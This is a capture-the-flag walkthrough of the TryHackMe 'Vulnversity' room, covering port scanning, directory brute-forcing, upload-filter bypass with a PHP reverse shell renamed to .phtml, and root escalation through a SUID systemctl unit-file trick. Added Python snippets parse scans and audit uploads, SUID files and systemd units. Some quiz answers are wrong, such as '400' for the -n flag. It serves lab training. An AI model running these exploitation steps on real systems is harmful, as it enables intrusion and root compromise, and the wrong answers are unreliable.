Tryhackme room ⇒ https://tryhackme.com/room/vulnversity
Task 1⇒ Deploy the machine
You don’t know how to start a machine and connect to the VPN?
What are you doing in this room?
Task 2⇒ Reconnaissance
Reconnaissance is always the first step to start from.
So let’s get started.
Scan this box:
nmap -sV -sC <machines ip>
-sV ⇒ If some ports are found to be open, Nmap may be able to determine what server software is running on the remote system. Version detection is enabled by the -sV option.
-sC ⇒ Performs a script scan using the default set of scripts.
└─$ nmap -sV -sC 10.10.101.12
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 22:56 IST
Nmap scan report for 10.10.168.183
Host is up (0.19s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
| System time: 2021-05-24T13:27:56-04:00
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_ Message signing enabled but not required
| date: 2021-05-24T17:27:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.25 seconds
Here we are done with the scan. So, let’s go through the results and answer the questions asked in Task 2⇒
Scan the box, how many ports are open?
⇒ ( Oh, come on! Just count them )
What version of the squid proxy is running on the machine?
⇒ 3.5.12 ( Watch out under 3333/tcp )
How many ports will Nmap scan if the flag -p-400 was used?
⇒ 400 ( Because they have used ‘-p-400’, which specifies the range of ports to be scanned )
Using the Nmap flag -n what will it not resolve?
⇒ 400 ( Always check the
What is the most likely operating system this machine is running?
⇒ Ubuntu ( Check the 22/tcp port )
What port is the webserver running on?
It’s important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)
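As an added example (not part of the original writeup), here is a small Python parser for the Nmap normal-output format shown above: it turns the port lines into records, counts the open ports and pulls out the Squid version and the web server port, which is what the Task 2 questions ask for. The embedded scan text is copied from the output above.

```python
import re

# Sample Nmap normal output, copied from the scan above and embedded here as a string.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
"""

# A port line is "<port>/<proto> <state> <service> <version...>"; NSE lines start with "|" and don't match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(text):
    """Return one dict per port line found in Nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version or ""})
    return ports


def count_open(ports):
    return sum(1 for p in ports if p["state"] == "open")


def version_of(ports, service):
    """Version banner of the first open port whose service name matches."""
    for p in ports:
        if p["state"] == "open" and p["service"] == service:
            return p["version"]
    return None


def squid_version(ports):
    """Pull the bare version number (e.g. '3.5.12') out of the Squid banner."""
    m = re.search(r"Squid http proxy (\S+)", version_of(ports, "http-proxy") or "")
    return m.group(1) if m else None


def webserver_ports(ports):
    """Open ports whose detected service is plain http (the proxy shows up as http-proxy)."""
    return [p["port"] for p in ports if p["state"] == "open" and p["service"] == "http"]
```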
Task 3⇒ Locating directories using GoBuster
Using a fast directory discovery tool called GoBuster, you will locate a directory that you or attackers usually can’t see or find, as the directories are hidden.
If you’re on Kali Linux, run
sudo apt-get install gobuster
Now let’s run GoBuster with a wordlist⇒
gobuster dir -u http://<ip>:3333 -w <wordlist location>
dir : Run in directory enumeration (brute-force) mode
-u : The target URL
-w : Path to your wordlist
└─$ gobuster dir -u http://10.10.101.12:3333/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://10.10.101.12:3333/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2021/05/24 22:58:13 Starting gobuster in directory enumeration mode
/images (Status: 301) [Size: 322] [--> http://10.10.101.12:3333/images/]
/css (Status: 301) [Size: 319] [--> http://10.10.101.12:3333/css/]
/js (Status: 301) [Size: 318] [--> http://10.10.101.12:3333/js/]
/fonts (Status: 301) [Size: 321] [--> http://10.10.101.12:3333/fonts/]
/internal (Status: 301) [Size: 324] [--> http://10.10.101.12:3333/internal/]
- What is the directory that has an upload form page?
All the directories look quite normal, but wait, take a look at /internal.
Let’s hop over to the http://10.10.101.12:3333/internal/ page.
What do you see?
An upload page.. whoo hoo! Let’s try exploiting this.
Task 4⇒ Compromise the webserver
Try upload a few file types to the server, what common extension seems to be blocked?
Let’s see ⇒ (.php). Read below to know how!!
Here I am taking a manual approach, checking only basic file extensions to see whether I am allowed to upload them. (Also, TryHackMe already gives a hint in the task.)
Anyway, if you want to try an automated approach to check for different file extensions without knowing the specific ones, first download SecLists. It is also super easy to install: just use APT to pull it from the repos, and then simply load the payload list from the file.
Comment below if you want to know more about it.
Moving on, the website seems to accept .jpg, .jpeg or .png files without complaint.
Let’s try uploading a file with the .php extension. Why PHP? [ Because most probably we are going to upload a PHP payload to get a reverse shell. ]
So, our .php file also got rejected, as you can see in Image 2.
Now, according to TryHackMe’s task, we should try different PHP extensions.
Let’s use Burp’s Intruder to fuzz the target machine with different PHP extensions.
If you don’t know how to set up Burp Suite, you can check the Burp Suite room on TryHackMe ⇒ https://tryhackme.com/room/rpburpsuite
Make sure FoxyProxy is set to Burp.
Let’s jump back to Burp, head to the Proxy tab and turn interception on⇒
Now we will repeat the process of uploading a .php file and click the Submit button; the request will be intercepted by Burp Suite.
Let’s start then.
Step1. Click the Browse button and upload a random .php file (or simply make one), then click Submit.
Here you can see I chose a file named random.php, and when I click Submit my POST request gets forwarded to Burp Suite.
Step2. Now head to Burp Suite, as your request will be captured under the Proxy tab.
Here you can see the POST request we made while uploading the .php file.
Step3. Right-click on the captured request and click Send to Intruder.
Now we have forwarded our request to Intruder.
Step4. Switch to the Intruder tab right beside the Proxy tab, and under it switch to the Positions tab, as shown in the image below ⇒
Step5. Ok, so we are finally in the Intruder tab, and from here we will start setting up our brute-force list of extensions.
Firstly, as you see on the right side there are 4 options:- Add, Clear, Auto, Refresh. Click the Clear option.
Now you will see that all the selections on the pane are gone, so we will select the string we want to brute force.
Here in the screenshot you can see my uploaded file name —> random.php
Whatever the name of your file is, just select the .php part of the whole name,
then go back to those four options on the right side and click the Add option.
Now you will notice that .php is wrapped in § signs, like this ⇒ §.php§
For reference check the images below ⇒
So, after this, you will see something like this ⇒
Step6. After completing the previous step, head to the Payloads tab right beside the Positions tab.
Here we will enter all the PHP extensions we know, to brute-force the upload form with that list.
Right under the heading Payload Options [Simple list]
Add these extensions ⇒
For reference see the screenshot below⇒
After completing this, just go a little further down and you will see an option URL-encode these characters under the heading Payload Encoding. Untick that option.
Finally, start the attack by clicking the Start Attack button at the top-right corner.
So what do you see?
Here we don’t see any difference in the status of all five extensions.
But look at the Length column: are they all the same?
No. 5, i.e. .phtml, shows a different length, which means it is being handled differently from the others.
So now we have our answer and will make our PHP payload in .phtml format.
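The Intruder run shows the weakness: the upload handler refuses the exact extension .php but lets .phtml through, and the server still runs .phtml as PHP. As an added example (not code from the room or the writeup), here is that kind of blocklist check in Python beside an allowlist version that only accepts the image types the form is meant for; the sample file names are constructed.

```python
import os

# The weak check: an explicit blocklist that names only the exact ".php" suffix.
BLOCKED = {".php"}

# The hardened check: an allowlist of the image types this upload form exists for.
ALLOWED_IMAGE = {".jpg", ".jpeg", ".png"}


def weak_filter_accepts(filename):
    """Vulnerable: refuse a name only if its last extension is in BLOCKED.

    Anything the server also executes as PHP but spells differently
    (.phtml in this room) sails straight through."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED


def strict_filter_accepts(filename):
    """Hardened: accept only a bare file name made of a stem plus known-good
    image suffixes. Every dot-separated suffix is checked, not just the last,
    and names carrying path separators are refused outright."""
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False
    parts = base.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False          # no extension at all, or an empty segment
    return all("." + p in ALLOWED_IMAGE for p in parts[1:])


def classify(filenames):
    """{name: (weak_accepts, strict_accepts)} for a batch of upload attempts."""
    return {n: (weak_filter_accepts(n), strict_filter_accepts(n)) for n in filenames}


# Constructed upload attempts, including the two names tried in the writeup.
SAMPLE = ["photo.png", "Photo.JPG", "random.php", "shell.phtml", "notes.txt"]

if __name__ == "__main__":
    for name, (weak, strict) in classify(SAMPLE).items():
        print(name, "blocklist:", "accept" if weak else "reject",
              "allowlist:", "accept" if strict else "reject")
```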
Let’s download our payload.
Here is the link:- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Copy the whole payload and make a new file on your desktop with the name shell.phtml.
Do change the IP address to your tun0 IP / attacker box IP. Like this⇒
It should look like this⇒
Now let’s upload our payload to the webpage http://10.10.101.12:3333/internal/ [Don’t forget to turn off the Burp proxy, it is not needed now]
There you see the innocent website accepted our uploaded payload.
Let’s start a listener on our attacker machine and then activate the payload on the website by going to http://10.10.130.56:3333/internal/uploads/shell.phtml
Go back to your terminal; you shall get a reverse shell.
Now let’s search for the flag.
Execute the command
What do you see?
The home directory, for now, seems favourable to us. Let’s jump to the home directory.
This time we see the bill directory.
Let’s switch to it.
Running ls, we get a user.txt file. Run
the cat command on it, as is obvious.
Hurray!! You got your first flag, so far so good!!
Answers to the Questions of this Task⇒
Try upload a few file types to the server, what common extension seems to be blocked?
what extension is allowed?
What is the name of the user who manages the webserver?
What is the user flag?
Task 5⇒ Privilege Escalation
Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because, to change your password, it needs to write to the shadow file, which you do not have access to but root does, so it runs with root privileges to make the right changes.
I know getting a reverse shell feels so good and fascinating. But what’s more fascinating? GETTING ROOT PRIVILEGES
Let’s do it then.
First, we will search for SUID files on the system. How do we do that?
find / -perm -u=s -type f 2>/dev/null
find / : Start the search at the root “/” directory
-perm : Match on the permission bits set on the file
-u=s : We want files whose SUID bit is set for the owning user
-type f : What are we searching for, a directory or a file? In our case a file, which is denoted by f
2>/dev/null : Here the number 2 = standard error (i.e. STDERR), and >/dev/null redirects that file descriptor 2 (i.e. STDERR) to /dev/null.
So in this case, we discard the unnecessary errors.
$ find / -perm -u=s -type f 2>/dev/null
Hey! Do you see /bin/systemctl in the output above?
Note- systemctl is the tool used to control the systemd init system.
Let’s go to https://gtfobins.github.io/ to find an exploit related to systemctl.
Here we have an exploit related to systemctl, let’s see what we get.
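The find command above is exactly what a defender should run on a schedule too, comparing the result against the binaries that are expected to be SUID. As an added example (not from the room or the writeup), this Python script performs that walk and flags anything outside a baseline; it builds a small constructed directory tree so it runs without root, and the baseline set is an assumption rather than a real host’s list.

```python
import os
import stat
import tempfile

# Constructed baseline of binaries expected to be SUID on a stock Ubuntu box (assumption;
# a real baseline is captured from a known-good host).
BASELINE = {"bin/passwd", "bin/sudo", "bin/su"}


def find_suid(root):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the SUID bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)             # lstat: never follow symlinks
            except OSError:
                continue                        # the shell version's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def unexpected_suid(root, baseline=BASELINE):
    """SUID files on the host that are not in the approved baseline."""
    return [p for p in find_suid(root) if p not in baseline]


def build_demo_root():
    """Throwaway tree mimicking the box: passwd (expected), systemctl (not), ls (no SUID)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    os.mkdir(os.path.join(root, "bin"))
    for name, suid in (("passwd", True), ("systemctl", True), ("ls", False)):
        path = os.path.join(root, "bin", name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, 0o755 | (stat.S_ISUID if suid else 0))   # set the bit after writing
    return root


def audit_demo():
    """Run the audit against the constructed tree; returns (all_suid, not_in_baseline)."""
    root = build_demo_root()
    return find_suid(root), unexpected_suid(root)


if __name__ == "__main__":
    found, bad = audit_demo()
    print("SUID files:", found, "\nNOT in baseline, investigate:", bad)
```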
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
This is the exploit we get.
Let me break the code down for you==>>
TF=$(mktemp).service ⇒ Here, as it seems, we are creating a variable TF (you can use any name you want; for now I leave it as the default).
Inside this variable we store the result of the mktemp command, with .service appended (mktemp exists to let shell scripts safely use temporary files).
echo '[Service] ⇒ It echoes the input, and that opening single quote [ ' ] allows us to enter several lines to complete our command.
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" ⇒ When the shell is invoked, the -c flag tells it to execute everything inside the quotes. Here it copies the content of root.txt into our output file.
WantedBy=multi-user.target' > $TF ⇒ sets the target at which the service will run. Notice the closing quote: everything between the quotes is now written into the file $TF.
/bin/systemctl link $TF ⇒ we are linking our unit file into systemd’s configuration.
/bin/systemctl enable --now $TF ⇒ we now enable and immediately start the service, which reads root.txt as we programmed.
Let’s try it in our victim shell==>>
$ echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
WantedBy=multi-user.target' > $TF
$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.D92XBoZD7f.service to /tmp/tmp.D92XBoZD7f.service.
$ /bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.D92XBoZD7f.service to /tmp/tmp.D92XBoZD7f.service.
Finally, we are done extracting the flag. Let’s check the path where we redirected the flag==>>
$ cat /tmp/output
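The two Created symlink lines above are the trace this technique leaves behind: a unit in /etc/systemd/system that is a symlink into /tmp. As an added example (not from the room or the writeup), this Python check walks a unit directory and flags units that resolve outside the trusted unit paths or whose ExecStart touches /root, run against a constructed copy of that layout.

```python
import os
import re
import tempfile

# Where unit files legitimately live (assumption: a standard systemd layout).
TRUSTED_UNIT_DIRS = ("/etc/systemd/system", "/lib/systemd/system", "/usr/lib/systemd/system")
SENSITIVE = re.compile(r"/root(/|$|\s)|/etc/shadow")   # paths ExecStart should never touch


def unit_findings(unit_dir, extra_trusted=()):
    """[(unit_name, reason)] for .service units under unit_dir that are symlinks resolving outside
    the trusted unit dirs (what `systemctl link` on a /tmp file leaves) or whose ExecStart is sensitive."""
    trusted = TRUSTED_UNIT_DIRS + tuple(os.path.realpath(d) for d in extra_trusted)
    findings = []
    for dirpath, _dirs, files in os.walk(unit_dir):
        for name in files:
            if not name.endswith(".service"):
                continue
            path = os.path.join(dirpath, name)
            real = os.path.realpath(path)
            if os.path.islink(path) and not real.startswith(trusted):
                findings.append((name, "symlink resolves to " + real))
            try:
                with open(real) as f:
                    lines = f.read().splitlines()
            except OSError:
                continue
            if any(l.startswith("ExecStart=") and SENSITIVE.search(l) for l in lines):
                findings.append((name, "ExecStart touches a sensitive path"))
    return findings


def build_demo_tree():
    """Constructed copy of the layout the exploit above leaves behind."""
    root = tempfile.mkdtemp(prefix="unit-audit-")
    unit_dir = os.path.join(root, "etc/systemd/system")
    os.makedirs(unit_dir)
    os.makedirs(os.path.join(root, "tmp"))
    with open(os.path.join(unit_dir, "ssh.service"), "w") as f:   # benign unit
        f.write("[Service]\nExecStart=/usr/sbin/sshd -D\n")
    hostile = os.path.join(root, "tmp", "tmp.D92XBoZD7f.service")  # name from the output above
    with open(hostile, "w") as f:
        f.write('[Service]\nExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"\n')
    os.symlink(hostile, os.path.join(unit_dir, "tmp.D92XBoZD7f.service"))
    return unit_dir


def audit_demo():
    unit_dir = build_demo_tree()
    return unit_findings(unit_dir, extra_trusted=(unit_dir,))
```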
Stay connected guys.
Suggest any writeups you want. I will try to bring them to you.❤